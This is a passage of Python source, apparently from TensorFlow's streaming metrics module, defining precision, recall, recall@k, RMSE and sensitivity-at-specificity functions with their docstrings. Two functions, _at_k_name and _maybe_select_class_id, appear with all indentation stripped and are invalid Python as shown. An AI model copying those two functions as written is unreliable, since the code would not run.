          math_ops.div(true_p, true_p + false_p),
          0,
          name)
    p = compute_precision('value')
    # `update_op` first folds the current batch into tp/fp, then recomputes
    # precision from the updated accumulators.
    with ops.control_dependencies([true_positives_update_op,
                                   false_positives_update_op]):
      update_op = compute_precision('update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, p)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return p, update_op
def precision_at_thresholds(labels, predictions, thresholds,
                            weights=None,
                            metrics_collections=None,
                            updates_collections=None, name=None):
  """Computes precision values for different `thresholds` on `predictions`.
  The `precision_at_thresholds` function creates four local variables,
  `true_positives`, `true_negatives`, `false_positives` and `false_negatives`
  for various values of thresholds. `precision[i]` is defined as the total
  weight of values in `predictions` above `thresholds[i]` whose corresponding
  entry in `labels` is `True`, divided by the total weight of values in
  `predictions` above `thresholds[i]` (`true_positives[i] / (true_positives[i] +
  false_positives[i])`).
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: A `bool` `Tensor` whose shape matches `predictions`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `auc` should be
      added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    precision: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables that
      are used in the computation of `precision`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(name, 'precision_at_thresholds',
                                     (predictions, labels, weights)):
    # Only tp and fp are needed for precision; skip building tn/fn ops.
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights, includes=('tp', 'fp'))
    tp = values['tp']
    fp = values['fp']
    # Avoid division by zero.
    epsilon = 1e-7
    def compute_precision(name):
      # Element-wise tp / (tp + fp) per threshold; epsilon keeps the result
      # finite (0) where tp + fp == 0.
      return math_ops.div(tp, epsilon + tp + fp, name='precision_' + name)
    prec = compute_precision('value')
    # Recompute precision only after the per-threshold counters are updated.
    with ops.control_dependencies(update_ops.values()):
      update_op = compute_precision('update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, prec)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return prec, update_op
def false_negatives(labels, predictions, weights=None,
                    metrics_collections=None,
                    updates_collections=None,
                    name=None):
  """Computes the total number of false negatives.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `bool` `Tensor` whose dimensions must
      match `predictions`.
    predictions: The predicted values, a `bool` `Tensor` of arbitrary
      dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.
  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.
  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  with variable_scope.variable_scope(
      name, 'false_negatives', (predictions, labels, weights)):
    predictions = ops.convert_to_tensor(predictions)
    labels = ops.convert_to_tensor(labels)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # False negative: label == 1 but prediction == 0.
    is_false_negative = math_ops.logical_and(math_ops.equal(labels, 1),
                                             math_ops.equal(predictions, 0))
    return _count_condition(is_false_negative, weights, metrics_collections,
                            updates_collections)
def recall(labels, predictions, weights=None,
           metrics_collections=None, updates_collections=None,
           name=None):
  """Computes the recall of the predictions with respect to the labels.
  The `recall` function creates two local variables, `true_positives`
  and `false_negatives`, that are used to compute the recall. This value is
  ultimately returned as `recall`, an idempotent operation that simply divides
  `true_positives` by the sum of `true_positives` and `false_negatives`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` that updates these variables and returns the `recall`. `update_op`
  weights each prediction by the corresponding value in `weights`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `bool` `Tensor` whose dimensions must
      match `predictions`.
    predictions: The predicted values, a `bool` `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `recall` should
      be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    recall: Scalar float `Tensor` with the value of `true_positives` divided
      by the sum of `true_positives` and `false_negatives`.
    update_op: `Operation` that increments `true_positives` and
      `false_negatives` variables appropriately and whose value matches
      `recall`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(
      name, 'recall', (predictions, labels, weights)):
    labels, predictions, weights = _remove_squeezable_dimensions(
        labels, predictions, weights)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # Streaming tp/fn accumulators; collections are handled here, not in the
    # sub-metrics, so pass None through.
    true_p, true_positives_update_op = true_positives(
        labels, predictions, weights, metrics_collections=None,
        updates_collections=None, name=None)
    false_n, false_negatives_update_op = false_negatives(
        labels, predictions, weights, metrics_collections=None,
        updates_collections=None, name=None)
    def compute_recall(true_p, false_n, name):
      # tp / (tp + fn), defined as 0 when there are no positive labels.
      return array_ops.where(
          math_ops.greater(true_p + false_n, 0),
          math_ops.div(true_p, true_p + false_n),
          0,
          name)
    rec = compute_recall(true_p, false_n, 'value')
    # `update_op` first folds the current batch into tp/fn, then recomputes
    # recall from the updated accumulators.
    with ops.control_dependencies([true_positives_update_op,
                                   false_negatives_update_op]):
      update_op = compute_recall(true_p, false_n, 'update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, rec)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return rec, update_op
def _at_k_name(name, k=None, class_id=None):
if k is not None:
name = '%s_at_%d' % (name, k)
else:
name = '%s_at_k' % (name)
if class_id is not None:
name = '%s_class%d' % (name, class_id)
return name
def _select_class_id(ids, selected_id):
  """Filter all but `selected_id` out of `ids`.
  Args:
    ids: `int64` `Tensor` or `SparseTensor` of IDs.
    selected_id: Int id to select.
  Returns:
    `SparseTensor` of same dimensions as `ids`. This contains only the entries
    equal to `selected_id`.
  """
  ids = sparse_tensor.convert_to_tensor_or_sparse_tensor(ids)
  if isinstance(ids, sparse_tensor.SparseTensor):
    # Sparse input: keep only the values equal to the selected id.
    return sparse_ops.sparse_retain(
        ids, math_ops.equal(ids.values, selected_id))
  # Dense input: intersect with a tensor filled with `selected_id`.
  # TODO(ptucker): Make this more efficient, maybe add a sparse version of
  # tf.equal and tf.reduce_any?
  # Shape of filled IDs is the same as `ids` with the last dim collapsed to 1.
  ids_shape = array_ops.shape(ids, out_type=dtypes.int64)
  ids_last_dim = array_ops.size(ids_shape) - 1
  filled_selected_id_shape = math_ops.reduced_shape(
      ids_shape, array_ops.reshape(ids_last_dim, [1]))
  # Intersect `ids` with the selected ID.
  filled_selected_id = array_ops.fill(
      filled_selected_id_shape, math_ops.to_int64(selected_id))
  result = sets.set_intersection(filled_selected_id, ids)
  # Re-wrap with the original dense shape so the result matches `ids`.
  return sparse_tensor.SparseTensor(
      indices=result.indices, values=result.values, dense_shape=ids_shape)
def _maybe_select_class_id(labels, predictions_idx, selected_id=None):
"""If class ID is specified, filter all other classes.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: `int64` `Tensor` of class IDs, with shape [D1, ... DN, k]
where N >= 1. Commonly, N=1 and `predictions_idx` has shape
[batch size, k].
selected_id: Int id to select.
Returns:
Tuple of `labels` and `predictions_idx`, possibly with classes removed.
"""
if selected_id is None:
return labels, predictions_idx
return (_select_class_id(labels, selected_id),
_select_class_id(predictions_idx, selected_id))
def _sparse_true_positive_at_k(labels,
                               predictions_idx,
                               class_id=None,
                               weights=None,
                               name=None):
  """Calculates true positives for recall@k and precision@k.
  If `class_id` is specified, calculate binary true positives for `class_id`
  only.
  If `class_id` is not specified, calculate metrics for `k` predicted vs
  `n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    name: Name of operation.
  Returns:
    A [D1, ... DN] `Tensor` of true positive counts.
  """
  with ops.name_scope(
      name, 'true_positives', (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(
        labels, predictions_idx, class_id)
    # Per-example true positives = size of the intersection of the predicted
    # class-id set with the label class-id set.
    tp = sets.set_size(sets.set_intersection(predictions_idx, labels))
    tp = math_ops.to_double(tp)
    if weights is not None:
      with ops.control_dependencies((_assert_weights_rank(weights, tp),)):
        weights = math_ops.to_double(weights)
        tp = math_ops.multiply(tp, weights)
    return tp
def _streaming_sparse_true_positive_at_k(labels,
                                         predictions_idx,
                                         k=None,
                                         class_id=None,
                                         weights=None,
                                         name=None):
  """Calculates weighted per step true positives for recall@k and precision@k.
  If `class_id` is specified, calculate binary true positives for `class_id`
  only.
  If `class_id` is not specified, calculate metrics for `k` predicted vs
  `n` label classes, where `n` is the 2nd dimension of `labels`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    k: Integer, k for @k metric. This is only used for default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    name: Name of new variable, and namespace for other dependent ops.
  Returns:
    A tuple of `Variable` and update `Operation`.
  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  with ops.name_scope(
      name, _at_k_name('true_positive', k, class_id=class_id),
      (predictions_idx, labels, weights)) as scope:
    # Per-batch (weighted) true-positive counts.
    tp = _sparse_true_positive_at_k(
        predictions_idx=predictions_idx, labels=labels, class_id=class_id,
        weights=weights)
    batch_total_tp = math_ops.to_double(math_ops.reduce_sum(tp))
    # Scalar local variable accumulating true positives across batches.
    var = _local_variable(array_ops.zeros([], dtype=dtypes.float64), name=scope)
    return var, state_ops.assign_add(var, batch_total_tp, name='update')
def _sparse_false_negative_at_k(labels,
                                predictions_idx,
                                class_id=None,
                                weights=None):
  """Calculates false negatives for recall@k.

  When `class_id` is given, binary false negatives are computed for that class
  alone. Otherwise, metrics cover the `k` predicted classes vs the `n` label
  classes, where `n` is the 2nd dimension of `labels_sparse`.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      holding the top `k` predicted classes. For rank `n`, the first `n-1`
      dimensions must match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).

  Returns:
    A [D1, ... DN] `Tensor` of false negative counts.
  """
  with ops.name_scope(
      None, 'false_negatives', (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(
        labels, predictions_idx, class_id)
    # Label classes missing from the predictions are false negatives
    # (`aminusb=False` takes labels minus predictions).
    false_negatives = math_ops.to_double(
        sets.set_size(
            sets.set_difference(predictions_idx, labels, aminusb=False)))
    if weights is None:
      return false_negatives
    with ops.control_dependencies(
        (_assert_weights_rank(weights, false_negatives),)):
      return math_ops.multiply(
          false_negatives, math_ops.to_double(weights))
def _streaming_sparse_false_negative_at_k(labels,
                                          predictions_idx,
                                          k,
                                          class_id=None,
                                          weights=None,
                                          name=None):
  """Accumulates weighted false negatives for recall@k.

  When `class_id` is given, binary false negatives are computed for that class
  alone. Otherwise, metrics cover the `k` predicted classes vs the `n` label
  classes, where `n` is the 2nd dimension of `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      holding the top `k` predicted classes. For rank `n`, the first `n-1`
      dimensions must match `labels`.
    k: Integer, k for @k metric. Used only for the default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    name: Name of new variable, and namespace for other dependent ops.

  Returns:
    A tuple of `Variable` and update `Operation`.

  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  with ops.name_scope(
      name, _at_k_name('false_negative', k, class_id=class_id),
      (predictions_idx, labels, weights)) as scope:
    # Per-row false-negative counts for this batch.
    batch_fn = _sparse_false_negative_at_k(
        labels=labels, predictions_idx=predictions_idx, class_id=class_id,
        weights=weights)
    batch_fn_sum = math_ops.to_double(math_ops.reduce_sum(batch_fn))
    # Scalar accumulator persisting across batches.
    accumulator = _local_variable(
        array_ops.zeros([], dtype=dtypes.float64), name=scope)
    return accumulator, state_ops.assign_add(
        accumulator, batch_fn_sum, name='update')
def recall_at_k(labels,
                predictions,
                k,
                class_id=None,
                weights=None,
                metrics_collections=None,
                updates_collections=None,
                name=None):
  """Computes recall@k of the predictions with respect to sparse labels.

  With `class_id` specified, recall is computed over only the batch entries
  whose labels contain `class_id`, as the fraction of those entries for which
  `class_id` appears in the top-k `predictions`. Without `class_id`, recall
  is how often, on average, a class from an entry's labels appears in the
  top-k `predictions`.

  Two local variables, `true_positive_at_<k>` and `false_negative_at_<k>`,
  accumulate the counts; the returned metric is the idempotent division
  `true_positive_at_<k> / (true_positive_at_<k> + false_negative_at_<k>)`.
  For streaming estimation, the returned `update_op` increments both
  variables from the current batch (weighted by `weights`) and evaluates to
  the updated recall.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range always count
      towards `false_negative_at_<k>`.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and predictions has shape [batch size,
      num_classes]. The final dimension contains the logit values for each
      class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric.
    class_id: Integer class ID for which we want binary metrics. This should
      be in range [0, num_classes), where num_classes is the last dimension of
      `predictions`. If class_id is outside this range, the method returns
      NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.

  Returns:
    recall: Scalar `float64` `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_negatives`.
    update_op: `Operation` that increments `true_positives` and
      `false_negatives` variables appropriately, and whose value matches
      `recall`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or
      `updates_collections` are not a list or tuple.
  """
  with ops.name_scope(
      name, _at_k_name('recall', k, class_id=class_id),
      (predictions, labels, weights)) as scope:
    labels = _maybe_expand_labels(labels, predictions)

    # Indices of the top-k predictions, as int64 for the set ops downstream.
    _, top_k_idx = nn.top_k(predictions, k)
    top_k_idx = math_ops.to_int64(top_k_idx)

    true_pos, true_pos_update = _streaming_sparse_true_positive_at_k(
        labels=labels, predictions_idx=top_k_idx, k=k, class_id=class_id,
        weights=weights)
    false_neg, false_neg_update = _streaming_sparse_false_negative_at_k(
        labels=labels, predictions_idx=top_k_idx, k=k, class_id=class_id,
        weights=weights)

    metric = math_ops.div(
        true_pos, math_ops.add(true_pos, false_neg), name=scope)
    update = math_ops.div(
        true_pos_update, math_ops.add(true_pos_update, false_neg_update),
        name='update')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, metric)
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return metric, update
def recall_at_thresholds(labels, predictions, thresholds,
                         weights=None, metrics_collections=None,
                         updates_collections=None, name=None):
  """Computes various recall values for different `thresholds` on `predictions`.

  Creates four local variables per threshold — `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives`. `recall[i]` is
  the total weight of `predictions` above `thresholds[i]` whose corresponding
  `labels` entry is `True`, divided by the total weight of `True` values in
  `labels` (`true_positives[i] / (true_positives[i] + false_negatives[i])`).

  For streaming estimation, the returned `update_op` updates these variables
  and evaluates to the updated `recall`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `bool` `Tensor` whose shape matches `predictions`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that `recall` should
      be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    recall: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables that
      are used in the computation of `recall`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(name, 'recall_at_thresholds',
                                     (predictions, labels, weights)):
    # Only tp/fn are needed for recall; skip computing tn/fp.
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights, includes=('tp', 'fn'))
    true_pos = values['tp']
    false_neg = values['fn']
    epsilon = 1e-7  # Guards against division by zero.

    def _recall(suffix):
      # One recall tensor per threshold, named by its role (value/update_op).
      return math_ops.div(
          true_pos, epsilon + true_pos + false_neg, name='recall_' + suffix)

    recall_tensor = _recall('value')
    with ops.control_dependencies(update_ops.values()):
      update_op = _recall('update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, recall_tensor)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return recall_tensor, update_op
def root_mean_squared_error(labels, predictions, weights=None,
                            metrics_collections=None,
                            updates_collections=None,
                            name=None):
  """Computes the root mean squared error between the labels and predictions.

  Two local variables, `total` and `count`, accumulate the weighted squared
  error; the returned metric is the idempotent square root of `total / count`.
  For streaming estimation, the returned `update_op` increments `total` with
  the weighted sum of squared element-wise differences between `predictions`
  and `labels`, increments `count` with the reduced sum of `weights`, and
  evaluates to the updated root mean squared error.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that
      `root_mean_squared_error` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    root_mean_squared_error: A `Tensor` representing the current mean, the
      value of `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `root_mean_squared_error`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  # RMSE is the square root of the streaming MSE; reuse its variables.
  mse, mse_update = mean_squared_error(
      labels, predictions, weights, None, None,
      name or 'root_mean_squared_error')
  rmse = math_ops.sqrt(mse)
  with ops.control_dependencies([mse_update]):
    update_op = math_ops.sqrt(mse_update)
  if metrics_collections:
    ops.add_to_collections(metrics_collections, rmse)
  if updates_collections:
    ops.add_to_collections(updates_collections, update_op)
  return rmse, update_op
def sensitivity_at_specificity(
    labels, predictions, specificity, weights=None, num_thresholds=200,
    metrics_collections=None, updates_collections=None, name=None):
  """Computes the sensitivity at a given specificity.

  The `sensitivity_at_specificity` function creates four local
  variables, `true_positives`, `true_negatives`, `false_positives` and
  `false_negatives` that are used to compute the sensitivity at the given
  specificity value. The threshold for the given specificity value is computed
  and used to evaluate the corresponding sensitivity.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `sensitivity`. `update_op` increments the `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` counts with the
  weight of each case found in the `predictions` and `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity

  Args:
    labels: A `bool` `Tensor` whose shape matches `predictions`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    specificity: A scalar value in range `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    num_thresholds: The number of thresholds to use for matching the given
      specificity.
    metrics_collections: An optional list of collections that `sensitivity`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    sensitivity: A scalar `Tensor` representing the sensitivity at the given
      `specificity` value.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables
      appropriately and whose value matches `sensitivity`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      `specificity` is not between 0 and 1, or if either `metrics_collections`
      or `updates_collections` are not a list or tuple.
  """
  if specificity < 0 or specificity > 1:
    raise ValueError('`specificity` must be in the range [0, 1].')
  with variable_scope.variable_scope(name, 'sensitivity_at_specificity',
                                     (predictions, labels, weights)):
    kepsilon = 1e-7  # to account for floating point imprecisions
    # Evenly spaced interior thresholds, plus endpoints nudged just outside
    # [0, 1] so that every prediction falls on one side of some threshold.
    thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
                  for i in range(num_thresholds-2)]
    thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights)
    tp = values['tp']
    fn = values['fn']
    tn = values['tn']
    fp = values['fp']
    def compute_sensitivity_at_specificity(name):
      # Pick the threshold whose specificity is closest to the target, then
      # report the sensitivity (recall) at that threshold.
      specificities = math_ops.div(tn, tn + fp + kepsilon)
      tf_index = math_ops.argmin(math_ops.abs(specificities - specificity), 0)
      tf_index = math_ops.cast(tf_index, dtypes.int32)
      # Now, we have the implicit threshold, so compute the sensitivity:
      return math_ops.div(tp[tf_index],
                          tp[tf_index] + fn[tf_index] + kepsilon,
                          name)
    sensitivity = compute_sensitivity_at_specificity('value')
    with ops.control_dependencies(update_ops.values()):
      update_op = compute_sensitivity_at_specificity('update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, sensitivity)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return sensitivity, update_op
def _expand_and_tile(tensor, multiple, dim=0, name=None):
  """Slice `tensor` shape in 2, then tile along the sliced dimension.

  A new dimension is inserted in shape of `tensor` before `dim`, then values
  are tiled `multiple` times along the new dimension.

  Args:
    tensor: Input `Tensor` or `SparseTensor`.
    multiple: Integer, number of times to tile.
    dim: Integer, dimension along which to tile.
    name: Name of operation.

  Returns:
    `Tensor` result of expanding and tiling `tensor`.

  Raises:
    ValueError: if `multiple` is less than 1, or `dim` is not in
      `[-rank(tensor), rank(tensor)]`.
  """
  if multiple < 1:
    raise ValueError('Invalid multiple %s, must be > 0.' % multiple)
  with ops.name_scope(
      name, 'expand_and_tile', (tensor, multiple, dim)) as scope:
    # Sparse.
    tensor = sparse_tensor.convert_to_tensor_or_sparse_tensor(tensor)
    if isinstance(tensor, sparse_tensor.SparseTensor):
      if dim < 0:
        # Convert a negative `dim` to its non-negative equivalent using the
        # tensor's (dynamic) rank, kept as a 1-element vector for the slices
        # below.
        expand_dims = array_ops.reshape(
            array_ops.size(tensor.dense_shape) + dim, [1])
      else:
        expand_dims = [dim]
      # Build the expanded shape by splicing a 1 into `dense_shape` at `dim`.
      expanded_shape = array_ops.concat_v2(
          (array_ops.slice(tensor.dense_shape, [0], expand_dims), [1],
           array_ops.slice(tensor.dense_shape, expand_dims, [-1])),
          0,
          name='expanded_shape')
      expanded = sparse_ops.sparse_reshape(
          tensor, shape=expanded_shape, name='expand')
      if multiple == 1:
        return expanded
      # Concatenating `multiple` copies along the new dimension performs the
      # tile. NOTE(review): for negative `dim`, `dim - 1` presumably accounts
      # for the rank having grown by one after the reshape — confirm against
      # sparse_concat's axis semantics.
      return sparse_ops.sparse_concat(
          dim - 1 if dim < 0 else dim, [expanded] * multiple, name=scope)
    # Dense.
    # For negative `dim`, `expand_dims` must target the position before `dim`
    # in the original tensor, hence `dim - 1`.
    expanded = array_ops.expand_dims(
        tensor, dim if (dim >= 0) else (dim - 1), name='expand')
    if multiple == 1:
      return expanded
    # Tile only the newly inserted dimension: multiples are 1 everywhere
    # except at position `dim`.
    ones = array_ops.ones_like(array_ops.shape(tensor))
    tile_multiples = array_ops.concat_v2(
        (ones[:dim], (multiple,), ones[dim:]), 0, name='multiples')
    return array_ops.tile(expanded, tile_multiples, name=scope)
def _num_relevant(labels, k):
  """Computes number of relevant values for each row in labels.

  For labels with shape [D1, ... DN, num_labels], this is the minimum of
  `num_labels` and `k`.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels].
    k: Integer, k for @k metric.

  Returns:
    Integer `Tensor` of shape [D1, ... DN], where each value is the number of
    relevant values for that row.

  Raises:
    ValueError: if inputs have invalid dtypes or values.
  """
  if k < 1:
    raise ValueError('Invalid k=%s.' % k)
  with ops.name_scope(None, 'num_relevant', (labels,)) as scope:
    labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
    # Sparse labels: count each row's entries individually.
    if isinstance(labels, sparse_tensor.SparseTensor):
      return math_ops.minimum(sets.set_size(labels), k, name=scope)
    # Dense labels: every row has the same count, min(last dim, k), broadcast
    # across the leading dimensions.
    dense_shape = array_ops.shape(labels)
    per_row_count = math_ops.minimum(dense_shape[-1], k)
    return array_ops.fill(dense_shape[0:-1], per_row_count, name=scope)
def _sparse_average_precision_at_k(labels, predictions, k):
  """Computes average precision@k of predictions with respect to sparse labels.

  From en.wikipedia.org/wiki/Information_retrieval#Average_precision, formula
  for each row is:
    AveP = sum_{i=1...k} P_{i} * rel_{i} / num_relevant_items

  A "row" is the elements in dimension [D1, ... DN] of `predictions`,
  `labels`, and the result `Tensors`. In the common case, this is
  [batch_size]. Each row of the results contains the average precision for
  that row.

  Internally, a `top_k` operation computes a `Tensor` indicating the top `k`
